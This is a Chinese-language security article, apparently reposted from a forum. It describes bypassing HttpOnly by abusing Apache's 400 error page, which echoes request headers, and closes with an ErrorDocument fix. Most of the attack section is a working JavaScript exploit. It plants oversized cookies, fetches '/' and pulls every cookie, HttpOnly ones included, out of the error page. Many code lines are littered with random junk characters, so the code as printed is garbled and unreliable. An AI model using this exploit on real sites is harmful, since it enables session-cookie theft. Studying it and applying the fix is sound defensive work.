很多程序以及一些商业或者成熟开源的cms文章系统,为了防止xss盗取用户cookie,一般都会给cookie加上httponly属性,禁止直接用js读取用户的cookie,从而降低xss的危害;而这个问题刚好可以用来绕过cookie的httponly属性。
用chrome打开一个站点,F12打开开发者工具,找到console,输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
// Writes or expires ten cookies named xss0..xss9 on path "/" (the loop below).
// With `good` falsy each value is the 819-byte filler `str`, which makes the
// browser's Cookie header large enough that the server described on this page
// answers 400; with `good` truthy the same names are rewritten with an
// already-past expiry, which makes the browser drop them again.
// Defender note: the oversized cookies are harmless by themselves -- the issue
// is a 400 error page that echoes the request headers (see the ErrorDocument
// fix at the end of this page).
function setCookies (good) {
$ }8 I% e. g2 }- B3 g// Build the 819-byte filler value
var str = "";
! \: c$ o6 x N0 r7 b) Afor (var i=0; i< 819; i++) {1 }8 _* b- z/ f, G6 d9 c
str += "x";3 z+ S* T A0 P w2 v% h% D
}! o! m' T6 B7 V/ z
// Write (or expire) cookies xss0..xss9 on path "/"
for (i = 0; i < 10; i++) {+ V' d% o7 o5 D+ y5 C# J
// good: past expiry date, so the browser drops the cookie
if (good) { _- i+ p+ A; n; y- [+ M
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";! q+ `8 S! V; v
}, X; A' D; T! L$ A# c9 S/ b3 o
// otherwise: the oversized filler value
else {1 X3 i y8 g8 ?
var cookie = "xss"+i+"="+str+";path=/";8 I# s- z# d3 g2 ]# p$ d
}% C P7 D5 z2 ^+ I
document.cookie = cookie;
0 H) d! J; h+ Z1 t9 \ {% }/ P}
! `7 ]( X8 H% B- G}
// Drives the check: plant the oversized cookies, GET "/" and inspect the reply.
// On the server described on this page the 400 error page echoes the request
// headers inside <pre>, so the Cookie header -- HttpOnly cookies included, since
// HttpOnly only hides them from document.cookie -- becomes readable from script.
// Detection: a burst of 400 responses to requests carrying an abnormally large
// Cookie header. Mitigation: ErrorDocument 400 with a custom message, or an
// upgraded Apache (both at the end of this page).
) W( X9 \9 ]3 pfunction makeRequest() {- a$ w& V% W1 X( v( \2 y# c
// Plant the filler cookies before the request goes out.
setCookies();
// XHR callback: only a completed reply with status 400 is examined.
: X W. p9 Y w; s- u3 x$ Vfunction parseCookies () {% z! B1 m7 C/ l b
var cookie_dict = {};' a( J, b, ?3 B7 Y( y
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
- l, Y9 v7 K/ [+ ?// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);# ?: W! V) C( m4 Y
if (content.length) {
# d$ |/ {% ?4 r' W3 @6 Q// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
f9 Y% M0 r9 P! w* s, R3 Y3 @var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);+ M6 O$ h6 n6 _! G1 @( Z ?) K: x
// Add cookies to object (the xssN filler entries were stripped above)
- `; `- e& a: yfor (var i=0; i<cookies.length; i++) {
8 l: {! B: w% g) r2 c& bvar s_c = cookies.split('=',2);
5 D1 U( J/ G. L$ k$ e! wcookie_dict[s_c[0]] = s_c[1];) w% Q3 y, r+ A$ i1 x% H
}
( J2 b x5 _7 W}
4 l* a0 c* q6 |$ `// Unset the filler cookies (past expiry) before showing the result
setCookies(true);1 f8 \1 N M* g9 _" j
alert(JSON.stringify(cookie_dict));
4 Z, `3 ^6 l! N& h/ j}# H; U0 O0 I- a0 K8 D; W9 U
}( h% |7 M5 {- N' Q; M; r! o, h
// Async GET to "/" on the same origin; parseCookies above handles the reply
* z& I0 h) \$ @/ ovar xhr = new XMLHttpRequest();9 D' z/ b' E' K9 ]" _
xhr.onreadystatechange = parseCookies;& \, U+ q5 u# a) Y; [
xhr.open("GET", "/", true);8 W# A- i2 k9 N) U! ~' E
xhr.send(null);. C6 r, v- U: \2 V C$ r2 I
}( Z7 _( x2 N& e5 v4 w
// Entry point: runs the check once the snippet is pasted into the console.
makeRequest();
你就能看见华丽丽的400错误包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message 输出一个简单生硬的错误代码信息
2. output a customized message 输出一段自定义的信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
经测试,对于400错误只有方法2(自定义错误信息)有效,返回包不会再包含cookie内容。
Apache配置:
ErrorDocument 400 "security test"
当然,升级apache到最新也可:)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html